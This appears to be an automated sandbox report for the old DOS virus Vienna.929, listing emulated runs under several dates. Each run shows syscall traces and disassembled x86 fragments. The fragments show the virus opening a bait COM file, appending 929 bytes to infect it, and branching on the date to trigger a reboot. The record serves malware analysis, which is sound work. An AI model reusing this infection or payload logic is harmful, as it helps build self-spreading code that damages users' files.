Sample viewer

vx.netlux.org/Virus.DOS.Vienna.929

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:52:30.561496927Z	47	PC: 13e73 \| Get disk transfer address
2018-12-17T22:52:30.563115358Z	26	PC: 13e58 \| Set disk transfer address
2018-12-17T22:52:30.564844115Z	42	PC: 13e82 \| Get date 0x13e82: cmp al, 1 0x13e84: jge 0x13e89 0x13e86: jmp 0x13ed4 0x13e88: nop 0x13e89: cmp al, 1 0x13e8b: ja 0x13ed4 0x13e8d: jmp 0x13e90 0x13e8f: nop 0x13e90: mov dl, 2 0x13e92: mov ah, 5 0x13e94: mov dh, 0x80 0x13e96: mov ch, 0 0x13e98: int 0x13 0x13e9a: mov cx, 0x14 0x13e9d: push cx 0x13e9e: call 0x13eab 0x13ea1: mov cx, 0x4000 0x13ea4: loop 0x13ea4 0x13ea6: pop cx 0x13ea7: loop 0x13e9d

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10906,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:29:27.800320809Z	47	PC: 13e73 \| Get disk transfer address
2018-12-25T12:29:27.802033607Z	26	PC: 13e58 \| Set disk transfer address
2018-12-25T12:29:27.804068983Z	42	PC: 13e82 \| Get date 0x13e82: cmp al, 1 0x13e84: jge 0x13e89 0x13e86: jmp 0x13ed4 0x13e88: nop 0x13e89: cmp al, 1 0x13e8b: ja 0x13ed4 0x13e8d: jmp 0x13e90 0x13e8f: nop 0x13e90: mov dl, 2 0x13e92: mov ah, 5 0x13e94: mov dh, 0x80 0x13e96: mov ch, 0 0x13e98: int 0x13 0x13e9a: mov cx, 0x14 0x13e9d: push cx 0x13e9e: call 0x13eab 0x13ea1: mov cx, 0x4000 0x13ea4: loop 0x13ea4 0x13ea6: pop cx 0x13ea7: loop 0x13e9d
2018-12-25T12:29:27.807264918Z	44	PC: 13ed8 \| Get time 0x13ed8: and dh, 0xf 0x13edb: cmp dh, 3 0x13ede: jb 0x13e9a 0x13ee0: cmp dh, 3 0x13ee3: ja 0x13f0f 0x13ee5: int 0x19 0x13ee7: mov ah, 0x47 0x13ee9: xor dl, dl 0x13eeb: add si, 0 0x13eee: nop 0x13eef: int 0x21 0x13ef1: jb 0x13f0f 0x13ef3: mov ah, 0x3b 0x13ef5: mov dx, si 0x13ef7: add dx, 0x40 0x13efa: nop 0x13efb: int 0x21 0x13efd: mov word ptr [bx + 0x5e], di 0x13f00: nop 0x13f01: mov si, bx
2018-12-25T12:29:27.80992539Z	78	PC: 13f93 \| Find first file
2018-12-25T12:29:27.832757559Z	67	PC: 13fd4 \| Get or set file attributes
2018-12-25T12:29:27.839055412Z	67	PC: 13fe6 \| Get or set file attributes
2018-12-25T12:29:27.85658447Z	61	PC: 13ff1 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:29:27.87296328Z	87	PC: 13ffd \| Get or set file date and time
2018-12-25T12:29:27.87436081Z	44	PC: 14009 \| Get time 0x14009: and dh, 7 0x1400c: jmp 0x1400f 0x1400e: nop 0x1400f: mov ah, 0x3f 0x14011: mov cx, 3 0x14014: mov dx, 0x44 0x14017: nop 0x14018: add dx, si 0x1401a: int 0x21 0x1401c: jb 0x14079 0x1401e: cmp ax, 3 0x14021: jne 0x14079 0x14023: mov ax, 0x4202 0x14026: mov cx, 0 0x14029: mov dx, 0 0x1402c: int 0x21 0x1402e: jb 0x14079 0x14030: mov cx, ax 0x14032: sub ax, 3 0x14035: mov word ptr [si + 0x48], ax
2018-12-25T12:29:27.876232447Z	63	PC: 1401c \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:29:27.881472167Z	66	PC: 1402e \| Move file pointer
2018-12-25T12:29:27.882613837Z	64	PC: 14058 \| Write file or device (Write 929 bytes on handle 5)
2018-12-25T12:29:27.888143485Z	66	PC: 1406a \| Move file pointer
2018-12-25T12:29:27.889768597Z	64	PC: 14079 \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:29:27.894618188Z	87	PC: 1408c \| Get or set file date and time
2018-12-25T12:29:27.895813646Z	62	PC: 14090 \| Close file
2018-12-25T12:29:27.901272684Z	67	PC: 1409f \| Get or set file attributes
2018-12-25T12:29:27.907909784Z	26	PC: 140ac \| Set disk transfer address
2018-12-25T12:29:27.908976782Z	9	PC: 12a85 \| Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T12:29:27.912822878Z	0	PC: 12a89 \| Program terminate

{"DateBased":true,"Day":6,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10906,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:29:28.246913917Z	47	PC: 13e73 \| Get disk transfer address
2018-12-25T12:29:28.249123279Z	26	PC: 13e58 \| Set disk transfer address
2018-12-25T12:29:28.254708854Z	42	PC: 13e82 \| Get date 0x13e82: cmp al, 1 0x13e84: jge 0x13e89 0x13e86: jmp 0x13ed4 0x13e88: nop 0x13e89: cmp al, 1 0x13e8b: ja 0x13ed4 0x13e8d: jmp 0x13e90 0x13e8f: nop 0x13e90: mov dl, 2 0x13e92: mov ah, 5 0x13e94: mov dh, 0x80 0x13e96: mov ch, 0 0x13e98: int 0x13 0x13e9a: mov cx, 0x14 0x13e9d: push cx 0x13e9e: call 0x13eab 0x13ea1: mov cx, 0x4000 0x13ea4: loop 0x13ea4 0x13ea6: pop cx 0x13ea7: loop 0x13e9d
2018-12-25T12:29:28.256893976Z	44	PC: 13ed8 \| Get time 0x13ed8: and dh, 0xf 0x13edb: cmp dh, 3 0x13ede: jb 0x13e9a 0x13ee0: cmp dh, 3 0x13ee3: ja 0x13f0f 0x13ee5: int 0x19 0x13ee7: mov ah, 0x47 0x13ee9: xor dl, dl 0x13eeb: add si, 0 0x13eee: nop 0x13eef: int 0x21 0x13ef1: jb 0x13f0f 0x13ef3: mov ah, 0x3b 0x13ef5: mov dx, si 0x13ef7: add dx, 0x40 0x13efa: nop 0x13efb: int 0x21 0x13efd: mov word ptr [bx + 0x5e], di 0x13f00: nop 0x13f01: mov si, bx
2018-12-25T12:29:28.272129418Z	78	PC: 13f93 \| Find first file
2018-12-25T12:29:28.279016279Z	67	PC: 13fd4 \| Get or set file attributes
2018-12-25T12:29:28.284756468Z	67	PC: 13fe6 \| Get or set file attributes
2018-12-25T12:29:28.301397964Z	61	PC: 13ff1 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:29:28.308149459Z	87	PC: 13ffd \| Get or set file date and time
2018-12-25T12:29:28.31903263Z	44	PC: 14009 \| Get time 0x14009: and dh, 7 0x1400c: jmp 0x1400f 0x1400e: nop 0x1400f: mov ah, 0x3f 0x14011: mov cx, 3 0x14014: mov dx, 0x44 0x14017: nop 0x14018: add dx, si 0x1401a: int 0x21 0x1401c: jb 0x14079 0x1401e: cmp ax, 3 0x14021: jne 0x14079 0x14023: mov ax, 0x4202 0x14026: mov cx, 0 0x14029: mov dx, 0 0x1402c: int 0x21 0x1402e: jb 0x14079 0x14030: mov cx, ax 0x14032: sub ax, 3 0x14035: mov word ptr [si + 0x48], ax
2018-12-25T12:29:28.321467087Z	63	PC: 1401c \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:29:28.32885464Z	66	PC: 1402e \| Move file pointer
2018-12-25T12:29:28.346622493Z	64	PC: 14058 \| Write file or device (Write 929 bytes on handle 5)
2018-12-25T12:29:28.355108068Z	66	PC: 1406a \| Move file pointer
2018-12-25T12:29:28.357145343Z	64	PC: 14079 \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:29:28.36372443Z	87	PC: 1408c \| Get or set file date and time
2018-12-25T12:29:28.365463199Z	62	PC: 14090 \| Close file
2018-12-25T12:29:28.374163333Z	67	PC: 1409f \| Get or set file attributes
2018-12-25T12:29:28.383488993Z	26	PC: 140ac \| Set disk transfer address
2018-12-25T12:29:28.38446468Z	9	PC: 12a85 \| Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T12:29:28.390893749Z	0	PC: 12a89 \| Program terminate

{"DateBased":true,"Day":7,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10906,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:29:29.677158935Z	47	PC: 13e73 \| Get disk transfer address
2018-12-25T12:29:29.67884754Z	26	PC: 13e58 \| Set disk transfer address
2018-12-25T12:29:29.680101851Z	42	PC: 13e82 \| Get date 0x13e82: cmp al, 1 0x13e84: jge 0x13e89 0x13e86: jmp 0x13ed4 0x13e88: nop 0x13e89: cmp al, 1 0x13e8b: ja 0x13ed4 0x13e8d: jmp 0x13e90 0x13e8f: nop 0x13e90: mov dl, 2 0x13e92: mov ah, 5 0x13e94: mov dh, 0x80 0x13e96: mov ch, 0 0x13e98: int 0x13 0x13e9a: mov cx, 0x14 0x13e9d: push cx 0x13e9e: call 0x13eab 0x13ea1: mov cx, 0x4000 0x13ea4: loop 0x13ea4 0x13ea6: pop cx 0x13ea7: loop 0x13e9d